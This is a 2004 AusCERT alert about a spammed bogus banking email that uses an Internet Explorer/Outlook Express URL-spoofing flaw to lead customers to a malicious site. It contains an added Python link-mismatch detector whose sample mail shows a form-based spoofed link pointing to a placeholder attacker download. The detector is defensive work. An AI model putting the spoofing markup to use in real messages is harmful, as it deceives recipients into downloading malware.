From: AL-2004.10 -- AUSCERT ALERT -- http://www.auscert.org.au/3981
      Bogus Banking Email Allows Trojan Infection for Outlook Users
-----------------------------------------------------------------------------
Date: 04 April 2004
AusCERT Cross Reference #: AA-2003.04, AL-2003.04

-----BEGIN PGP SIGNED MESSAGE-----

==================================================
        A U S C E R T   A L E R T

        AL-2004.10 -- AUSCERT ALERT
        Bogus Banking Email Allows Trojan Infection for Outlook Users
        4 April 2004
==================================================

AusCERT Alert Summary
---------------------

Product:            Microsoft Internet Explorer 6
                    Microsoft Internet Explorer 5.01
                    Microsoft Internet Explorer 5.5
                    Microsoft Outlook Express 6
                    Microsoft Outlook Express 5.5
                    Microsoft Outlook Express 5
Operating System:   Windows
Impact:             Execute Arbitrary Code/Commands
                    Access Privileged Data
Access Required:    Remote

PROBLEM:

        A vulnerability in Microsoft Internet Explorer and Outlook Express is
        being used to trick online banking customers into visiting a malicious
        web site. The vulnerability[2] allows a URL to be spoofed by
        manipulating the information displayed in the status bar using an
        embedded form. Ordinarily, manipulating the status bar requires
        scripting; because the embedded form achieves it without any script,
        the spoof also works in the "Restricted" zone, where scripting is
        disabled by default, so the protection that zone normally provides is
        bypassed.

        A bogus email message exploiting this vulnerability is currently being
        heavily spammed to Australian users. There are at least four known
        variants of the same email message, each appearing to come from a
        major Australian bank, with a "From:" field likely to be a valid email
        address for the respective institution to augment the deception.

        The body text of the message appears to the user like this:

            Dear user!

            We are informing you that today, the amount of $XXX AUD has
            been drawn out of your account.

            Technical assistance of YYY Bank.
            http://www.ZZZ.com.au

        Moving the mouse over the URL will not reveal the true destination in
        the status area of the email or browser window; it will appear the
        same as in the text. Clicking the link, however, will initiate a
        connection to a malicious site, the impact of which could include the
        downloading of a binary program and execution of malicious commands on
        the user's computer.

        At this time AusCERT is not aware of any available patch from
        Microsoft for this vulnerability. The impact on users of this
        vulnerability is similar to that reported in AA-2003.04[3].

PLATFORM:

        Affects Windows platforms running Internet Explorer and Outlook
        Express.

IMPACT:

        Execute commands on the local computer and/or capture private
        information, including keystroke logging.

MITIGATION:

        AusCERT recommends that users do not follow the URL in any email they
        receive that has the format shown in this alert, and that they neither
        respond to nor follow any instructions in the message. It is
        advisable to remain aware of the potential for undesirable
        consequences that could arise from following URLs in unsolicited
        messages.

        In general, banking customers should always contact their financial
        institution if they are unsure of the authenticity of an unsolicited
        message that purports to be from their bank. More information about
        online banking safety is available in AL-2003.04[4], and users are
        strongly advised to reread this document.

        Users should, as ever, remain aware of the danger of opening
        unsolicited email attachments and review the advice in the article
        "Protecting your computer from malicious code"[1].
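        The deception described above rests on one fact: the element the
        user sees (and whose URL the status bar shows on hover) is not the
        element that decides where the click goes. A mail gateway or mail
        client can catch that pattern without knowing the exact markup by
        recording, for every clickable element, the target a click would
        really reach and comparing its host with the host named in the
        visible link text. The following checker is an added example and is
        not code from AusCERT, from the alert, or from the Secunia advisory.
        The markup in SAMPLE_MAIL is a constructed guess at how a link-like
        control inside a form might be built; the alert does not give the
        actual markup, and the bank and download hosts are placeholders.

```python
"""Flag links in an HTML mail body whose visible URL text names a different
host than the one a click would actually reach.

Added example (not from the alert).  For every clickable element we record
the real target: the href of an <a>, or, for a submit control, the action of
the enclosing <form>.  Any element whose visible text looks like a URL but
whose real target lives on another host is reported.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkTargetAuditor(HTMLParser):
    """Collect (visible_text, real_target) pairs from an HTML document."""

    def __init__(self):
        super().__init__()
        self.form_actions = []   # actions of the currently open <form> elements
        self.anchor_href = None  # href of the currently open <a>, if any
        self.anchor_text = []    # text seen inside the current <a>
        self.findings = []       # (visible_text, real_target)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "a":
            self.anchor_href = a.get("href") or ""
            self.anchor_text = []
        elif tag == "input" and (a.get("type") or "").lower() in ("submit", "image"):
            # A submit control goes where its form says, regardless of any <a>
            # wrapped around it; its label (value/alt) is what the user reads.
            visible = a.get("value") or a.get("alt") or "".join(self.anchor_text)
            target = self.form_actions[-1] if self.form_actions else ""
            self.findings.append((visible.strip(), target))

    def handle_endtag(self, tag):
        if tag == "form" and self.form_actions:
            self.form_actions.pop()
        elif tag == "a" and self.anchor_href is not None:
            self.findings.append(("".join(self.anchor_text).strip(), self.anchor_href))
            self.anchor_href = None

    def handle_data(self, data):
        if self.anchor_href is not None:
            self.anchor_text.append(data)


def looks_like_url(text):
    t = text.strip().lower()
    return t.startswith(("http://", "https://", "www."))


def host_of(url):
    """Hostname of a URL, tolerating the bare 'www.example.com' form."""
    u = url.strip()
    if u.lower().startswith("www."):
        u = "http://" + u
    return (urlparse(u).hostname or "").lower()


def mismatched_links(html_body):
    """Return [(visible_text, real_target)] for every clickable element whose
    displayed URL names a different host than the one a click would reach."""
    auditor = LinkTargetAuditor()
    auditor.feed(html_body)
    auditor.close()
    hits = []
    for visible, target in auditor.findings:
        if not looks_like_url(visible):
            continue
        real = host_of(target)
        # Relative or empty targets carry no host to compare against.
        if real and real != host_of(visible):
            hits.append((visible, target))
    return hits


# Constructed sample in the shape of the message quoted in the alert.  The
# bank host and the download host are placeholders, not the real ones, and
# the form/anchor/submit layout is an assumption about the markup.
SAMPLE_MAIL = """
<p>Dear user!</p>
<p>We are informing you that today, the amount of $XXX AUD has been drawn
out of your account.</p>
<p>Technical assistance of YYY Bank.</p>
<form action="http://attacker.invalid/update.exe">
  <a href="http://www.ZZZ.com.au">
    <input type="submit" value="http://www.ZZZ.com.au"
           style="border:0;background:none;color:blue;text-decoration:underline">
  </a>
</form>
<p>Online help: <a href="http://www.ZZZ.com.au/help">http://www.ZZZ.com.au/help</a></p>
"""

if __name__ == "__main__":
    for visible, target in mismatched_links(SAMPLE_MAIL):
        print(f"SUSPICIOUS: shows {visible!r} but a click goes to {target!r}")
```

        Run against SAMPLE_MAIL, the checker reports only the submit control:
        its label and the surrounding anchor both say http://www.ZZZ.com.au,
        but the enclosing form sends the click to attacker.invalid, which is
        exactly the hover-versus-click discrepancy the alert describes. The
        legitimate help link, whose text and href agree, is not reported. The
        check is deliberately conservative: it only judges elements whose
        visible text is itself a URL, so ordinary "Click here" links are left
        to other heuristics.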
REFERENCES:

        [1] Protecting your computer from malicious code
            http://www.auscert.org.au/render.html?it=3352

        [2] Secunia Security Advisory
            http://secunia.com/advisories/11273

        [3] AusCERT Advisory AA-2003.04
            http://www.auscert.org.au/render.html?it=3680

        [4] AusCERT Alert AL-2003.04
            http://www.auscert.org.au/render.html?it=2909

- ---------------------------------------------------------------------------
The AusCERT team has made every effort to ensure that the information
contained in this security bulletin is accurate at the time of publication.
However, the decision to follow or act on information or advice contained in
this security bulletin is the responsibility of each user or organisation,
and should be considered in accordance with your organisation's site policies
and procedures. AusCERT takes no responsibility for consequences which may
arise from following or acting on information or advice contained in this
security bulletin.

If you believe that your computer system has been compromised or attacked in
any way, we encourage you to let us know by completing the secure National IT
Incident Reporting Form at:

        http://www.auscert.org.au/render.html?it=3192

AusCERT maintains a World Wide Web service which is found on:

        http://www.auscert.org.au

Internet Email: auscert@xxxxxxxxxxxxxx
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
Postal:         Australian Computer Emergency Response Team
                The University of Queensland
                Brisbane
                Qld 4072
                AUSTRALIA
===================================================
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.auscert.org.au/render.html?it=1967

iQCVAwUBQHACgyh9+71yA2DNAQH6SgP/ZCuWiLmkCuglO2ngYJ9uIFRNVDFk0voD
J3KKdoLIESv+tHVdNVYslSwu7WPVMW3AlP1fju2dd0+VA0Cb9/VVUjWwtR309X0C
kdU0DyWCAWVv5R4nYi7YfGUmFF0BPKndyDo77mchfgjChAk/VlP5GYcA8iYmPECu
hlqaTbpNjdg=
=OyrJ
-----END PGP SIGNATURE-----